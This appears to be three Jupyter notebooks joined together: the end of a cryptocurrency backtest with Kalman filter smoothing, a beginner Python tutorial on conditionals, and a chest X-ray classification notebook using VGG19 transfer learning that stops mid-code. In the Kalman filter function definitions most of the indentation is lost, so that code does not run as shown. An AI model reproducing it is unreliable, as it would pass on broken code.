Backtest with initial capital of $10000
###Code
# Set the initial capital
initial_capital= float(10000.0)
# Create a DataFrame `positions`
positions = pd.DataFrame(index=trading_signal_week.index).fillna(0.0)
# Hold a 10-coin position in the direction of the signal
positions['bitcoin_price'] = 10*trading_signal_week['signal']
# Initialize the portfolio with value owned
portfolio = positions.multiply(y_short.tail(365), axis=0)
# Store the difference in shares owned
pos_diff = positions.diff()
# Add `holdings` to portfolio
portfolio['holdings'] = (positions.multiply(y_short.tail(365), axis=0)).sum(axis=1)
# Add `cash` to portfolio
portfolio['cash'] = initial_capital - (pos_diff.multiply(y_short.tail(365), axis=0)).sum(axis=1).cumsum()
# Add `total` to portfolio
portfolio['total'] = portfolio['cash'] + portfolio['holdings']
# Add `returns` to portfolio
portfolio['returns'] = portfolio['total'].pct_change()
portfolio = portfolio.loc["2017-09-16":]
fig, ax1 = plt.subplots(1, 1, figsize=(16,9))
duration = 120
ax1.plot(portfolio['total'])
###Output
_____no_output_____
###Markdown
Sharpe Ratio
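The annualized Sharpe ratio computed below is

$$\text{Sharpe} = \sqrt{365}\,\frac{\bar{r}}{\sigma_r}$$

where $\bar{r}$ and $\sigma_r$ are the mean and standard deviation of the daily returns, and $\sqrt{365}$ annualizes the ratio since crypto trades every day of the year.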
###Code
# Isolate the returns of your strategy
returns = portfolio['returns']
# annualized Sharpe ratio
sharpe_ratio = np.sqrt(365) * (returns.mean() / returns.std())
# Print the Sharpe ratio
print(sharpe_ratio)
###Output
1.285548404196041
###Markdown
Maximum Drawdown
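The drawdown at time $t$ over a trailing window $w$ is

$$\text{DD}_t = \frac{P_t}{\max_{t-w < s \le t} P_s} - 1$$

i.e., the loss relative to the highest price seen within the window; the maximum drawdown below is its running minimum.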
###Code
# Define a trailing 365-day window (crypto trades every calendar day)
window = 365
# Calculate the max drawdown in the past window days for each day
rolling_max = y_short.rolling(window, min_periods=1).max()
daily_drawdown =y_short/rolling_max - 1.0
# Calculate the minimum (negative) daily drawdown
max_daily_drawdown = daily_drawdown.rolling(window, min_periods=1).min()
# Plot the results
daily_drawdown.plot()
max_daily_drawdown.plot()
# Show the plot
plt.show()
###Output
_____no_output_____
###Markdown
Given the noise in the signal produced by the Random Forest, let's try using a Kalman filter to smooth things out, starting with k = 1.
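The model fitted below (see the functions defined at the end of this notebook) is a standard linear-Gaussian state-space model,

$$u_t = T\,u_{t-1} + w_t,\quad w_t \sim N(0, Q)$$
$$y_t = Z\,u_t + v_t,\quad v_t \sim N(0, H)$$

with a latent state $u_t$ of dimension $k$; the parameters $T$, $Q$, $Z$, $H$ are estimated by minimizing the negative log-likelihood computed by the filter.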
###Code
Y = y_pred
_,_,k_value = KalmanFilter_main(Y,1)
###Output
Optimization terminated successfully.
Current function value: 3342.569807
Iterations: 216
Function evaluations: 379
T*u_smooth[-1] is -6731.038446064072; Z*u_tplus1 is 8061.573704184884
###Markdown
Plot actual vs. Kalman predictions. The peaks appear to have been smoothed out.
###Code
plt.rcParams['figure.figsize'] = (15, 9)
timevec = y.tail(365).index
fig = plt.plot(timevec, -k_value,'r',timevec, Y,'b:')
###Output
_____no_output_____
###Markdown
Comparing Actual Prices versus Kalman Smoothed Prices
###Code
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16,9))
#ax1.plot(ema_short.tail(365).index,y_pred_short,label="prediction")
ax1.plot(X.tail(365).index,y_short.tail(365),label="actual")
ax2.plot(X.tail(365).index,-k_value)
ax1.set_ylabel("Actual Prices")
ax2.set_ylabel("Kalman Prices")
ax1.legend(loc='best')
ax2.legend(loc='best')
###Output
No handles with labels found to put in legend.
###Markdown
Functions defined below
###Code
from scipy import optimize
def KalmanFilter(R,k,params):
    S_length = R.shape[0]
    S = S_length+1
    # Map the unconstrained optimizer params into valid ranges:
    # 2/(1+exp(-p))-1 squashes into (-1, 1); exp(p) enforces positivity
    if k == 1:
        Z = np.array(2/(1+np.exp(-params[0]))-1)
        H = np.array(np.exp(params[1]))
        T = np.array(2/(1+np.exp(-params[2]))-1)
        Q = np.array(np.exp(params[3]))
if k == 2:
Z = np.array([[2/(1+np.exp(-params[0]))-1,2/(1+np.exp(-params[1]))-1]])
H = np.array(np.exp(params[2]))
T = np.array([[2/(1+np.exp(-params[3]))-1,0],[0,2/(1+np.exp(-params[4]))-1]])
Q = np.array([[np.exp(params[5]),0],[0,np.exp(params[6])]])
u_predict = np.zeros((k,S));
u_update = np.zeros((k,S));
P_predict = np.zeros((k,k,S));
P_update = np.zeros((k,k,S));
v = np.zeros((1,S));
F = np.zeros((1,S));
KF_Dens = np.zeros((1,S));
for i in range(S):
if i == 0:
P_update[:,:,i] = 1000*np.eye(k)
P_predict[:,:,i] = T.dot(np.array(P_update[0][0][0]).dot(T.T))+Q
else:
F[0][i] = Z.dot(P_predict[:,:,i-1].dot(Z.T))+H
v[0][i] = R.T.flatten()[i-1]-Z.dot(u_predict[:,i-1])
u_update[:,i] = u_predict[:,i-1]+P_predict[:,:,i-1].dot(Z.T.dot(np.linalg.inv([[F[0][i]]]).dot(v[0][i]))).flatten()
u_predict[:,i] = T.dot(u_update[:,i])
P_update[:,:,i] = P_predict[:,:,i-1]-P_predict[:,:,i-1].dot(Z.T.dot(np.linalg.inv([[F[0][i]]]).dot(Z.dot(P_predict[:,:,i-1]))))
P_predict[:,:,i] = T.dot(P_update[:,:,i]).dot(T.T)+Q
KF_Dens[0][i] = (1.0/2)*np.log(2*np.pi)+(1.0/2)*np.log(np.abs(F[0][i]))+(1.0/2)+v[0][i].T*np.linalg.inv([[F[0][i]]])*v[0][i]
Likelihood = np.sum(KF_Dens)-KF_Dens[0][0]
varargout = [u_update, P_update, P_predict, T]
return Likelihood, varargout
def KalmanSmoother(R,k,params_star):
_,vararg = KalmanFilter(R,k,params_star)
u_update = vararg[0]
P_update = vararg[1]
P_predict = vararg[2]
T = np.array(vararg[3])
S = R.shape[0]+1
u_smooth = np.zeros((k,S))
P_smooth = np.zeros((k,k,S))
u_smooth[:,S-1] = u_update[:,S-1]
P_smooth[:,:,S-1] = P_update[:,:,S-1]
for t in reversed(range(1,S)): # 2 to S inverse sequence
u_smooth[:,t-1] = u_update[:,t] + P_update[:,:,t].dot(T.T.dot(np.linalg.inv(P_predict[:,:,t]).dot((u_smooth[:,t]-T.dot(u_update[:,t])))))
P_smooth[:,:,t-1] = P_update[:,:,t] + P_update[:,:,t].dot(T.T).dot(np.linalg.inv(P_predict[:,:,t])).dot((P_smooth[:,:,t]-P_predict[:,:,t])).dot(np.linalg.inv(P_predict[:,:,t])).dot(T).dot(P_update[:,:,t])
u_smooth = u_smooth.flatten()[1:]
return u_smooth
def KalmanFilter_main(R,k):
r = 0.25*np.log(np.var(R,axis = 0,ddof=1))
if k == 1:
param0 = np.append(np.append(np.append(np.array(100),r,),100),r)
if k == 2:
param0 = np.append(np.append(np.append(np.array([100,100]),4*r),[-100,-100]),[r,r])
def objective(params):
Likelihood,_ = KalmanFilter(R,k,params)
return Likelihood
params_star= optimize.fmin(objective,param0)
u_smooth = KalmanSmoother(R, k, params_star)
Z = 2/(1+np.exp(-params_star[0]))-1;
H = np.exp(params_star[1]);
T = 2/(1+np.exp(-params_star[2]))-1;
Q = np.exp(params_star[3]);
u_tplus1 = T*u_smooth[-1] + np.random.normal()*np.sqrt(Q)
price_tplus1 = Z*u_tplus1 + np.random.normal()*np.sqrt(H)
print('T*u_smooth[-1] is {}; Z*u_tplus1 is {}'.format(T*u_smooth[-1],Z*u_tplus1))
return price_tplus1,u_tplus1,u_smooth
###Output
_____no_output_____
###Markdown
For k = 2, we normalize the values using (Y - mean(Y)) / std(Y)
###Code
Y_2=(y_pred-y_pred.mean())/y_pred.std()
_,_,k_value_2 = KalmanFilter_main(Y_2,2)
fig = plt.plot(np.linspace(1,365,365), k_value_2[366:],'r',np.linspace(1,365,365), Y_2,'b:')
###Output
_____no_output_____ |
python/practice/1-4_condition.ipynb | ###Markdown
Creating Conditionals: Comparison Operators
###Code
a = 3
b = 5
a < b
c = 3
d = 3
c <= d
c != d
###Output
_____no_output_____
###Markdown
Logical operators (and / or / not): and
###Code
True and True
True and False
###Output
_____no_output_____
###Markdown
or
###Code
True or True
True or False
False or False
###Output
_____no_output_____
###Markdown
not
###Code
not True
not False
###Output
_____no_output_____
###Markdown
in: checking whether a value is an element of a collection: in / not in
###Code
e = [1, 3, 5, 7]
0 in e
1 in e
2 not in e
3 not in e
###Output
_____no_output_____
###Markdown
if / else
###Code
if condition :
    statement_1
    statement_2
else :
    statement_3
    statement_4
money = True
if money :
    print("Go on a trip")
else :
    print("Stay home and rest")
###Output
Go on a trip
###Markdown
if / elif / else
###Code
if condition_1 :
    statement_1
elif condition_2 :
    statement_2
else :
    statement_3
money = 20000
if money < 5000 :
    print('Eat ramen')
elif 5000 <= money < 25000 :
    print('Eat chicken')
elif 25000 <= money < 50000 :
    print('Eat pork belly')
else :
    print('Eat beef')
###Output
Eat chicken
###Markdown
Practice Problems 5. Question 1: Given a and b, print 'Failure' if a times b is greater than 30, and 'Success' if it is 30 or less.
###Code
a = 6
b = 3
# Write your answer here.
###Output
Success
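###Markdown
One possible solution (a sketch, one of many; a * b is 18 here, which is not greater than 30):
###Code
if a * b > 30 :
    print('Failure')
else :
    print('Success')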
###Markdown
Question 2: Print 'Failure' if the remainder of a divided by b is greater than 3, 'Draw' if it is exactly 3, and 'Success' if it is less than 3.
###Code
a = 3
b = 4
# Write your answer here.
# Write your answer here.
###Output
Draw
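###Markdown
One possible solution (a sketch; 3 % 4 is 3 here, so this prints "Draw"):
###Code
if a % b > 3 :
    print('Failure')
elif a % b == 3 :
    print('Draw')
else :
    print('Success')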
###Markdown
pass
###Code
money = 20000
card = True
if card :
    if money < 30000 :
        print("Eat pork belly")
    else :
        print("Eat beef")
else :
    if money <= 1000 :
        pass
    else :
        print("Eat ramen")
money = 1000
card = False
if card :
    if money < 30000 :
        print("Eat pork belly")
    else :
        print("Eat beef")
else :
    if money <= 1000 :
        pass
    else :
        print("Eat ramen")
###Output
_____no_output_____
###Markdown
Practice Problems 6. Question 1: Predict the results of running the following code.
###Code
3 <= 6
15 % 8 == 3
298 % 100 < 5
tmp = []
if tmp :
print('Not empty!')
else :
print("empty!")
tmp2 = [1,5,8,'e','n','.']
if 3 not in tmp2 :
print("X")
else :
print("O")
###Output
_____no_output_____
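###Markdown
For reference, the expected results are: 3 <= 6 is True; 15 % 8 == 3 is False (15 % 8 is 7); 298 % 100 < 5 is False (the remainder is 98); the empty list tmp is falsy, so "empty!" is printed; and since 3 is not an element of tmp2, "X" is printed.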
###Markdown
Question 2: To keep the summer power supply stable, the government recommends using air conditioning only when the indoor temperature is 26 degrees or higher. Accordingly, the company wants to control its central heating and cooling. Write code that prints 'fan' when the indoor temperature is below 26 degrees and 'air conditioner' when it is 26 degrees or higher. (Print each word to the screen.) Verify that it works by changing the temperature.
###Code
temp = 29
# Write your answer here.
###Output
air conditioner
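###Markdown
One possible solution (a sketch; temp is 29 here, so this prints "air conditioner"):
###Code
if temp < 26 :
    print('fan')
else :
    print('air conditioner')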
###Markdown
Question 3: We want to build a machine that determines how many digits a number has. Write a conditional that prints 1 for a one-digit number, 2 for a two-digit number, and 3 for a three-digit number. (The given number has at most three digits.)
###Code
num = 78
# Write your answer here.
# Write your answer here.
###Output
_____no_output_____ |
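###Markdown
One possible solution (a sketch; num is 78 here, so this would print 2):
###Code
if num < 10 :
    print(1)
elif num < 100 :
    print(2)
else :
    print(3)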
Final Capstone - Classifying Chest X-Rays/Using Deep Learning to Classify Chest X-Rays.ipynb | ###Markdown
Using Deep Learning for Medical ImagingIn the United States, it takes an average of [1 to 5 days](https://www.ncbi.nlm.nih.gov/pubmed/29132998) to receive a diagnosis after a chest x-ray. This long wait has been shown to increase anxiety in 45% of patients. In addition, impoverished countries usually lack personnel with the technical knowledge to read chest x-rays, assuming an x-ray machine is even available. In such cases, a [short term solution](https://www.theatlantic.com/health/archive/2016/09/radiology-gap/501803/) has been to upload the images online and have volunteers read the images; volunteers diagnose an average of 4000 CT scans per week. This solution works somewhat, but many people travel for days to a clinic and cannot keep traveling back and forth for a diagnosis or treatment, nor can those with more life threatning injuries wait days for a diagnosis. Clearly, there is a shortage of trained physicians/radiologists for the amount of care needed. To help reduce diagnosis time, we can turn to deep learning. Specifically, I will be using 3 pre-trained models (VGG19, MobileNet, and ResNet50) to apply transfer learning to chest x-rays. The largest database of chest x-ray images are compiled by the NIH Clinical Center and can be found [here](https://www.nih.gov/news-events/news-releases/nih-clinical-center-provides-one-largest-publicly-available-chest-x-ray-datasets-scientific-community). The database has 112,120 X-ray images from over 30,000 patients. There are 14 different pathologies/conditions and a 'no findings' label, for a total of 15 different labels. Due to time constraints, this notebook will go through the steps as I used transfer learning to train two of these labels: pneumonia and effusion. 1 - Retrieving the Data For this project, I used tensorflow and Keras for my deep learning library. Unfortunately, I ran into reproduciblity problems, which seems to be a common problem (see [machinelearningmastery](https://machinelearningmastery.com/reproducible-results-neural-networks-keras/) and this [StackOverflow question](https://stackoverflow.com/questions/48631576/reproducible-results-using-keras-with-tensorflow-backend)) which is why I set random seeds for python hash seed, numpy, and python in my import section.
###Code
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
import os
import cv2
import random
from PIL import Image
import skimage
from skimage import io
from skimage.transform import resize
from numpy import expand_dims
from sklearn.model_selection import train_test_split
from sklearn.metrics import precision_score, recall_score,accuracy_score, f1_score, roc_curve, confusion_matrix, roc_curve,roc_auc_score
import tensorflow as tf
os.environ['PYTHONHASHSEED']='0'
np.random.seed(42)
random.seed(42)
import keras
from keras import backend as K
# import keras.backend.tensorflow_backend as K
tf.random.set_seed(42)
from keras.preprocessing.image import load_img, ImageDataGenerator, img_to_array
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Conv2D, GlobalAveragePooling2D, BatchNormalization
from keras.models import Model
from keras.optimizers import RMSprop, Adam
from keras.applications.vgg19 import preprocess_input, decode_predictions, VGG19
from keras.applications.mobilenet import MobileNet
from keras.applications.resnet import ResNet50
dirpath = 'all_images/'
alldata_df = pd.read_csv('./Data_Entry_2017.csv')
###Output
_____no_output_____
###Markdown
2 - Data Exploration

The master dataframe below shows all the information we have for each image, including the image filename, label(s), patient information, and image height and width.
###Code
alldata_df.head()
###Output
_____no_output_____
###Markdown
2.1 - Pathologies

One thing to notice is that each image can have multiple labels. To isolate each individual pathology, I will create a column for each pathology and use 1 and 0 to indicate whether the image has that pathology (1) or not (0).
###Code
alldata_df['Labels List'] = alldata_df['Finding Labels'].apply(lambda x: x.split('|'))
pathology_lst = ['Cardiomegaly', 'No Finding', 'Hernia', 'Infiltration', 'Nodule',
'Emphysema', 'Effusion', 'Atelectasis', 'Pleural_Thickening',
'Pneumothorax', 'Mass', 'Fibrosis', 'Consolidation', 'Edema',
'Pneumonia']
def get_label(col, pathology):
if pathology in col:
return 1
else:
return 0
for pathology in pathology_lst:
alldata_df[pathology] = alldata_df['Labels List'].apply(lambda x: get_label(x, pathology))
###Output
_____no_output_____
###Markdown
Below is a table of the percentage of each label in the dataset. Not surprisingly, the 'no findings' label makes up the majority of the images, at about 50%. The two pathologies I'd like to train on are pneumonia and effusion. Pneumonia, a pathology most of us have heard of, makes up about 1.2% of the dataset, whereas effusion is ~10%. This corresponds to a total of 1431 and 13317 images for pneumonia and effusion respectively. Due to the small number of images available for pneumonia, I suspect it will be difficult to get good results.
###Code
alldata_df[pathology_lst].sum()/alldata_df.shape[0]*100
###Output
_____no_output_____
###Markdown
2.2 - Image Data

There are two things to explore in the image data before diving into creating models. It's useful to know the heights and widths of the images, especially since the models I'm using expect a dimension of 224 x 224 pixels. The distributions of the heights and widths are shown in the histograms below. Most of the images have a height of 2000 pixels, although a good number of them hover at 2500 and 3000, with a minimum of ~970 pixels. The widths also have 3 distinct peaks, with the largest at 2500 and significant peaks at 2000 and 3000 pixels, and a minimum of ~1140 pixels. All the images have dimensions greater than 224.
###Code
fig, (axis1, axis2) = plt.subplots(1, 2, figsize=(15, 4))
sns.distplot(alldata_df['Height]'], ax = axis1)
sns.distplot(alldata_df['OriginalImage[Width'], ax = axis2)
axis1.set_title('Distribution of Image Height')
axis2.set_title('Distribution of Image Widths')
for ax in [axis1, axis2]:
ax.set_xlabel('Pixels')
ax.set_ylabel('Density')
plt.tight_layout()
###Output
/usr/local/lib/python3.5/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.
return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval
###Markdown
Another column is the view position. There are two unique values in this column: PA and AP. These indicate whether the x-rays pass from the back to the front of the body or vice versa, so I'd like to find out if there are any stark differences in the images between the two view positions. Most of the images are in the PA viewing position. This is preferred because the AP position creates 'shadows'; AP images are taken when the patient is unable to stand up for the PA position and needs to lie down on a table.
###Code
alldata_df['View Position'].value_counts()/alldata_df.shape[0]*100
def get_images(filename_df, target_pathology, num_images = 500, imageSize = 224):
X = []
sample_df = filename_df.sample(n = num_images)
sample_df.reset_index(drop = True, inplace = True)
truncated_image_filename_lst = sample_df['Image Index'].values
full_image_filename_lst = []
for truncated_filename in truncated_image_filename_lst:
full_image_filename_lst.append(find_file(truncated_filename))
for i, file in enumerate(full_image_filename_lst):
img_file = cv2.imread(file)
img_file = cv2.resize(img_file, (imageSize, imageSize), interpolation = cv2.INTER_CUBIC)
img_arr = np.asarray(img_file)
if img_arr.shape == (224, 224, 3):
X.append(img_arr)
else:
sample_df.drop(i, inplace = True)
y = sample_df[target_pathology]
return np.array(X), np.array(y)
# images extractred from 12 files,
image_dir = sorted([dir for dir in os.listdir(dirpath) if 'images' in dir ])
def find_file(filename):
for dirfile in image_dir:
if filename in os.listdir(dirpath + dirfile + '/images'):
return dirpath + dirfile + '/images/' + filename
pa_images, _ = get_images(alldata_df[alldata_df['View Position']=='PA'], 'No Finding', num_images = 9, imageSize = 224)
ap_images, _ = get_images(alldata_df[(alldata_df['View Position']=='AP') & (alldata_df['No Finding']==1)], 'No Finding', num_images = 9, imageSize = 224)
###Output
_____no_output_____
###Markdown
Below I've plotted 16 images total. To make sure there aren't any differences due to pathologies, I only took from the 'no findings' label. The first 8 images are X-rays in the PA position (the majority), and the latter 8 images are in the AP position. The PA images seem to generally have a white mass near the bottom, although how much white varies from image to image. In addition, there is a small protrusion to the left of the spine, and a larger protrusion to the right of the spine. The AP images are similar, but much blurrier, possibly due to the shadows mentioned before.
###Code
plt.figure(figsize = (13, 6))
print('Images for PA view')
for i in range(8):
plt.subplot(2, 4, i+1)
tmp1 = pa_images[i].astype(np.uint8)
plt.imshow(tmp1)
plt.tight_layout()
plt.figure(figsize = (13, 6))
print('Images for AP view')
for i in range(8):
plt.subplot(2, 4, i+1)
tmp1 = ap_images[i].astype(np.uint8)
plt.imshow(tmp1)
plt.tight_layout()
###Output
Images for AP view
###Markdown
I looked at the percentages of AP vs. PA view positions for 'pneumonia' and 'effusion', and threw in the overall percentage and 'no finding' for comparison. The overall and no-findings numbers are pretty close, with PA positions at 60-65%. However, the PA percentages for 'pneumonia' and 'effusion' are lower, at 45-50%. Although removing AP images might improve the models, for pneumonia it would leave too few images to train on.
###Code
pathology_percent_lst = ['No Finding', 'Pneumonia', 'Effusion']
pa_percent_lst = [alldata_df[(alldata_df[path]==1) & (alldata_df['View Position'] == 'PA')].shape[0]/alldata_df[(alldata_df[path]==1)].shape[0]*100 for path in pathology_percent_lst]
ap_percent_lst = [alldata_df[(alldata_df[path]==1) & (alldata_df['View Position'] == 'AP')].shape[0]/alldata_df[(alldata_df[path]==1)].shape[0]*100 for path in pathology_percent_lst]
pathology_percent_lst.insert(0, 'Overall')
pa_percent_lst.insert(0, alldata_df[alldata_df['View Position']=='PA'].shape[0]/alldata_df.shape[0]*100)
ap_percent_lst.insert(0, alldata_df[alldata_df['View Position']=='AP'].shape[0]/alldata_df.shape[0]*100)
ap_pa_percent_df = pd.DataFrame(np.array([pa_percent_lst, ap_percent_lst]),
columns = pathology_percent_lst,
index = ['PA', 'AP'])
ap_pa_percent_df
###Output
_____no_output_____
###Markdown
2.3 - Splitting into Training, Validation, and Test Sets

Lastly, the original [paper](http://openaccess.thecvf.com/content_cvpr_2017/papers/Wang_ChestX-ray8_Hospital-Scale_Chest_CVPR_2017_paper.pdf) split the images into training/validation and test sets and released that information to the public so we can easily compare our results to theirs. I have split my own data into the same training/validation and test sets as the original authors.
###Code
train_val_filenames = pd.read_csv('./train_val_list.txt', sep=" ", header=None)
test_filenames = pd.read_csv('./test_list.txt', sep=" ", header=None)
train_val_filenames.shape[0] + test_filenames.shape[0]
train_val_df = alldata_df[alldata_df['Image Index'].isin(train_val_filenames.values.flatten())]
test_df = alldata_df[alldata_df['Image Index'].isin(test_filenames.values.flatten())]
###Output
_____no_output_____
###Markdown
3 - Pneumonia

First, I will be performing transfer learning on pneumonia images. In order, the three models I will be using are VGG19, MobileNet, and ResNet50.

3.1 - VGG19 Model

First I must preprocess the images. The VGG model expects an image size of 224 x 224 pixels.
###Code
imgSize = 224
###Output
_____no_output_____
###Markdown
Note: After writing this notebook, I realized my smaller test set should have the same distribution of pathologies as the original test set. This will be corrected the next time I improve upon this project.
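A minimal sketch of that fix (hypothetical; not used for the results below): draw the smaller test sample with stratification on the label so its class balance matches the released test split.
###Code
# Hypothetical stratified sampling sketch: keep the original pneumonia
# prevalence (~1%) instead of forcing the 50/50 balance used below
from sklearn.model_selection import train_test_split
_, stratified_test_df = train_test_split(test_df,
                                         test_size=2000,
                                         random_state=42,
                                         stratify=test_df['Pneumonia'])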
###Code
# Get test images
Xtest_pneu, ytest_pneu = get_images(test_df[test_df['Pneumonia']==1],
'Pneumonia',
num_images = test_df[test_df['Pneumonia']==1].shape[0],
imageSize = imgSize)
Xtest_notpneu, ytest_notpneu = get_images(test_df[test_df['Pneumonia']==0],
'Pneumonia',
num_images = test_df[test_df['Pneumonia']==1].shape[0],
imageSize = imgSize)
X_test_pneu = np.concatenate((Xtest_pneu, Xtest_notpneu), axis = 0)
y_test_pneu = np.concatenate((ytest_pneu, ytest_notpneu))
###Output
_____no_output_____
###Markdown
I use sklearn's train_test_split function to shuffle the test set. Unfortunately, that means I lose 1% of the images, leaving 1099 images total in the test set.
###Code
_, X_test_pneu, _, y_test_pneu = train_test_split(X_test_pneu,
y_test_pneu,
test_size=0.99,
random_state=42,
stratify = y_test_pneu)
###Output
_____no_output_____
###Markdown
The training and validation sets have a total of 1752 and 351 images respectively.
###Code
# get training images and split into validation set
Xtrain_pneu, ytrain_pneu = get_images(train_val_df[train_val_df['Pneumonia']==1],
'Pneumonia',
num_images = train_val_df[train_val_df['Pneumonia']==1].shape[0],
imageSize = imgSize)
Xtrain_notpneu, ytrain_notpneu = get_images(train_val_df[train_val_df['Pneumonia']==0],
'Pneumonia',
num_images = train_val_df[train_val_df['Pneumonia']==1].shape[0],
imageSize = imgSize)
Xtrain_pneu = np.concatenate((Xtrain_pneu, Xtrain_notpneu), axis = 0)
ytrain_pneu = np.concatenate((ytrain_pneu, ytrain_notpneu))
X_train_pneu, X_val_pneu, y_train_pneu, y_val_pneu = train_test_split(Xtrain_pneu,
ytrain_pneu,
test_size=0.2,
random_state=42,
stratify = ytrain_pneu)
###Output
_____no_output_____
###Markdown
Next, I need to convert the images into a format accepted by the VGG model.
###Code
def convert_X_data(Xtrain, Xval, Xtest, imageSize = 224, num_classes = 2):
if K.image_data_format() == 'channels_first':
Xtrain_model = Xtrain.reshape(Xtrain.shape[0], 3, imageSize, imageSize)
Xval_model = Xval.reshape(Xval.shape[0], 3, imageSize, imageSize)
Xtest_model = Xtest.reshape(Xtest.shape[0], 3, imageSize, imageSize)
else:
Xtrain_model = Xtrain.reshape(Xtrain.shape[0], imageSize, imageSize, 3)
Xval_model = Xval.reshape(Xval.shape[0], imageSize, imageSize, 3)
Xtest_model = Xtest.reshape(Xtest.shape[0], imageSize, imageSize, 3)
Xtrain_model = Xtrain_model.astype('float32')
Xval_model = Xval_model.astype('float32')
Xtest_model = Xtest_model.astype('float32')
Xtrain_model = preprocess_input(Xtrain_model)
Xval_model = preprocess_input(Xval_model)
Xtest_model = preprocess_input(Xtest_model)
return Xtrain_model, Xval_model, Xtest_model
def convert_y_data(ytrain, yval, ytest, num_classes = 2):
ytrain_model = keras.utils.to_categorical(ytrain, num_classes)
yval_model = keras.utils.to_categorical(yval, num_classes)
ytest_model = keras.utils.to_categorical(ytest, num_classes)
return ytrain_model, yval_model, ytest_model
X_train_pneu_model, X_val_pneu_model, X_test_pneu_model = convert_X_data(X_train_pneu,
X_val_pneu,
X_test_pneu,
imageSize = imgSize,
num_classes = 2)
y_train_pneu_model, y_val_pneu_model, y_test_pneu_model = convert_y_data(y_train_pneu,
y_val_pneu,
y_test_pneu,
num_classes = 2)
###Output
_____no_output_____
###Markdown
Lastly, Keras only has built-in functions for accuracy and loss. I am interested in accuracy, precision, recall, and f1 scores, however, so I will write my own function to compute these metrics. The two metrics I'm most concerned about are the recall and f1 score. I am interested in the recall because, for a medical dataset, I believe it is best to reduce false negatives. However, I know there are cases where the model predicts all 0s or all 1s, which would skew the precision and recall. As such, it is important to look at f1 scores as well.
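As a reminder, the f1 score is the harmonic mean of precision and recall:

$$F_1 = 2 \cdot \frac{\text{precision} \cdot \text{recall}}{\text{precision} + \text{recall}}$$

so a model that games either precision or recall alone cannot achieve a high f1 score.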
###Code
def get_metrics(model, xtest, ytrue, verbose = True):
y_pred_probs = model.predict(xtest)
try:
y_pred_classes = model.predict_classes(xtest)
except AttributeError:
y_pred_classes = [np.argmax(i) for i in y_pred_probs]
y_pred_probs = y_pred_probs[:, 0]
    try:
        y_pred_classes = y_pred_classes[:, 0]
    except (IndexError, TypeError):  # already 1-D, or a plain list from the argmax branch
        pass
if verbose:
print('Accuracy Score: {}'.format(accuracy_score(ytrue, y_pred_classes)))
print('Precision Score: {}'.format(precision_score(ytrue, y_pred_classes)))
print('Recall: {}'.format(recall_score(ytrue, y_pred_classes)))
print('F1 Score: {}'.format(f1_score(ytrue, y_pred_classes)))
print('Confusion matrix: \n{}'.format(confusion_matrix(ytrue, y_pred_classes)))
return accuracy_score(ytrue, y_pred_classes), precision_score(ytrue, y_pred_classes), recall_score(ytrue, y_pred_classes), f1_score(ytrue, y_pred_classes)
###Output
_____no_output_____
###Markdown
3.1.1 - VGG Baseline with Pneumonia Images

The first step is to establish the baseline metrics for the VGG model. To do this, I first import the layers from the VGG model. Since this model was trained on the ImageNet dataset, it expects to predict from 1000 classes. I replace this last layer with a dense layer with 2 classes and softmax activation, and compile the model with Keras's categorical cross-entropy loss function. Lastly, due to the reproducibility issues mentioned at the beginning, I run the model 3 times, average the metrics, and show the standard deviation.

For the baseline, the model has an accuracy of ~50% while the precision is ~0.55 and the recall and f1 score are ~0.23, so this is just about as good as flipping a coin given that the test set is balanced. In addition, the standard deviations for the recall and f1 scores are just about as big as the averaged scores themselves, so the reliability of this baseline model is very poor.
###Code
num_classes = 2
vgg_model = VGG19()
vgg_baseline_acc_scores = []
vgg_baseline_prec_scores = []
vgg_baseline_recall_scores = []
vgg_baseline_f1_scores = []
for i in range(3):
vgg_model_baseline = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_baseline.add(layer)
vgg_model_baseline.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_baseline.layers:
layer.trainable = False
vgg_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_baseline_history = vgg_model_baseline.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model, y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(vgg_model_baseline, X_test_pneu_model, y_test_pneu, verbose = True)
vgg_baseline_acc_scores.append(acc)
vgg_baseline_prec_scores.append(prec)
vgg_baseline_recall_scores.append(recall)
vgg_baseline_f1_scores.append(f1)
print('Accuracy of VGG baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_baseline_acc_scores) * 100, np.std(vgg_baseline_acc_scores)*100))
print('Precision of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_prec_scores), np.std(vgg_baseline_prec_scores)))
print('Recall of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_recall_scores), np.std(vgg_baseline_recall_scores)))
print('f1 score of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_f1_scores), np.std(vgg_baseline_f1_scores)))
###Output
Accuracy of VGG baseline model: 49.50 +/- 1.29%
Precision of VGG baseline model: 0.545 +/- 0.055
Recall of VGG baseline model: 0.236 +/- 0.279
f1 score of VGG baseline model: 0.229 +/- 0.226
###Markdown
3.1.2 - Training Layers with VGG19 and Pneumonia Images

A way to fine-tune and hopefully improve upon this baseline model is to unfreeze certain layers. That is, the weights imported by the VGG (or any) model are optimized for the ImageNet dataset; unfreezing layers allows the model to learn the features of the current dataset. Typically, the first layers of the model are kept frozen, as they extract big/common features, while the last layers extract features that are more specific to your dataset. VGG19 has 26 layers, and I found it optimal to train the last 4 layers, leaving the first 22 frozen. With this model, the accuracy rises slightly to ~53% while the precision stays the same. Recall and f1 score rise to over 0.60. In addition, the standard deviations are drastically reduced.
###Code
vgg_frozen_acc_scores = []
vgg_frozen_prec_scores = []
vgg_frozen_recall_scores = []
vgg_frozen_f1_scores = []
for i in range(3):
vgg_model_frozen = Sequential()
for layer in vgg_model.layers[:-1]:
